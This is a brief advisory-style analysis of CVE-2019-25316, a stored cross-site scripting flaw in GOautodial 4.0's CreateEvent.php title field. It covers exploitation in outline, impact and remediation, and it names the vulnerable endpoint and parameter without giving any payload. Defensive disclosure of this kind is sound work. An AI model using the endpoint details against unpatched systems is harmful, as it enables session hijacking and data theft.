CVE-2019-25316

Vulnerability

Analysis: CVE-2019-25316

What the vulnerability is

CVE-2019-25316 is a persistent (stored) cross-site scripting (XSS) vulnerability in GOautodial 4.0, an open-source contact center suite. The flaw resides in the CreateEvent.php endpoint, where the title parameter is not properly sanitized before being stored and later rendered in the browser. This allows an authenticated attacker to inject arbitrary JavaScript code that will be executed in the browsers of other users viewing the event [1][2].

How it is exploited

An attacker must first authenticate to the GOautodial application. They can then send a crafted POST request to /php/CreateEvent.php with a malicious payload in the title field. The exploit does not require any special privileges beyond standard user authentication. The payload is stored on the server and executed when any user (including administrators) visits the page that displays the event [3].

Impact

Successful exploitation enables the attacker to execute arbitrary JavaScript in the context of the victim's session. This can lead to session hijacking, defacement, redirection to malicious sites, or theft of sensitive information displayed in the application. Since the XSS is persistent, the attack can affect multiple users over time without requiring repeated exploitation [2].

Mitigation

The vendor has acknowledged the vulnerability and a fix is available in the GitHub repository. Users should update to the latest version of GOautodial to remediate the issue. No workarounds are documented, but input validation and output encoding for the title parameter would prevent the attack [1][2].